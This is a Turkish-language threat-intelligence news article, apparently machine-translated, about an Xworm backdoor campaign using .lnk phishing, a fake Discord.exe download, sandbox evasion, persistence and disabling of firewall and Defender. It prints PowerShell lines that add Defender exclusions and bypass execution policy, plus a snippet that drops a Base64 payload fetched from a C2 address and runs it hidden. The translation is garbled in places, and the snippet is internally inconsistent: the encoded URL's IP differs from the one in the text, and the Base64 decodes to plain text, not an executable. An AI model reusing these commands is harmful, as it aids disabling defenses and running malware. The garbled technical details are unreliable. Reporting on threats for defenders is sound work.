2015’in ortalarında sessizce ortaya çıkan Xworm Backdoor, hem kullanıcı güvenini hem de sistem kurallarını avlayan aldatıcı bir şekilde sofistike bir tehdide dönüştü.
İlk raporlar, kuruluşlar, iyi huylu belgeler olarak maskelenen belirsiz .lnk tabanlı kimlik avı e-postalarında ani bir artış kaydettiklerinde ortaya çıktı.
Güvenlik ekipleri, bu kısayolların beklenen dosyaları açmak yerine gizli PowerShell rutinlerini tetiklediğini ve yeni bir enfeksiyon zincirinin ortaya çıkmasını önerdiğini hızla gözlemledi.
Günler içinde, birden fazla sektördeki işletmeler, aktif bir komut ve kontrol (C2) altyapısını ima eden, alışılmadık IP adreslerine anormal ağ bağlantıları bildirdi.
Kampanya ivme kazandıkça, Trellix analistleri Xworm’un daha önceki, daha öngörülebilir yöntemlerinden önemli bir ayrılma belirledi.
Basit parti komut dosyaları ve bariz VBScript yükleri gitti; Bunun yerine, saldırganlar şimdi hem sosyal mühendislik hem de teknik alt-fugestan yararlanan çok aşamalı bir mekanizma kullanıyor.
Genellikle hedeflenen mızrak aktı ile teslim edilen ilk .lnk dosyası, uzak bir ana bilgisayardan sessizce “Discord.exe” almadan önce iyi huylu görünümlü bir metin artefaktı bırakır.
.webp)
Yürütme üzerine, bu .NET tabanlı yürütülebilir dosyalar açar ve iki ek bileşeni başlatır-Main.exe ve System32.exe-ikincisi çekirdek Xworm yükü olarak hizmet eder.
System32.exe tutulduktan sonra, bir kum havuzu veya sanal makineyi algılayıp tespit ederse iptal ederek titiz ortam kontrolleri gerçekleştirir.
Ana bilgisayar orijinal olarak kabul edilirse, kötü amaçlı yazılım kendisini xclient.exe olarak kopyalar ve hem planlanmış bir görev hem de kayıt defteri çalıştırma anahtarı oluşturarak kalıcılık oluşturur.
Sistem savunmaları metodik olarak sökülür: Windows güvenlik duvarı politikaları, değişiklikler yoluyla devre dışı bırakılır. HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DisableFirewallPowerShell yürütme politikaları kötü niyetli süreçleri beyaz listelemek için atlanır.
ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "C:\Temp\discord.exe"
ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess "Xclient.exe"Bu komutlar, Xworm’un asgari inceleme altında çalışmasını sağlayarak, tehlikeye atılan ortama sınırsız erişime izin verir.
Enfeksiyon mekanizması ve dağıtım
Xworm’un yeni zincirinin kalbi, Rijndael şifre çözme ile birleştiğinde Base64 kodlamasının ustaca kullanımında yatar ve yükün yürütülene kadar gizli kalmasına izin verir.
Başlangıç .lnk dosyası, tek satırlı bir PowerShell komutuna kod çözen bir Base64 dizesi yerleştirir.
.webp)
Bu komut “Discord.exe” i alır. hxxp://85[.]203[.]4[.]232:5000/Discord.exegizlice piyasaya sürmeden önce temp dizinine kaydetme.
$payload = "ZG93bmxvYWQgZnJvbSAgaHR0cDovLzg1LjIwMy4zLjIzMjo1MDAwL0Rpc2NvcmQuZXhl"
[IO.File]::WriteAllBytes("$env:TEMP\discord.exe", [Convert]::FromBase64String($payload))
Start-Process "$env:TEMP\discord.exe" -WindowStyle HiddenAktivasyondan sonra, Discord.exe, her biri statik analizi engellemek için gelişmiş gizleme teknikleriyle dolu Main.exe ve System32.exe’yi düşürür.
Main.exe’nin kaynak bölümü gömülü python modüllerini taşırken, System32.exe, herhangi bir güvenlik kancası müdahale etmeden önce kritik kodu yürütmek için erken TLS geri çağrıları uygular.
.webp)
Bu katmanlı yaklaşım sadece tespiti karmaşıklaştırmakla kalmaz, aynı zamanda her bir bileşenin bir sonrakini güçlendirmesini sağlar ve geleneksel savunma stratejilerine meydan okuyan esnek, gizli odaklı bir enfeksiyon zinciri verir.
Bu evrim sayesinde Xworm, sosyal mühendisliğin harmanlanması, çok aşamalı yük teslimatı ve sofistike kriptografik gizlemenin, rakiplerin mevcut algılama teknolojilerini geride bırakmasını ve hedeflenen ağlardaki hem gizli hem de kalıcılığı koruyabileceğini gösteriyor.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.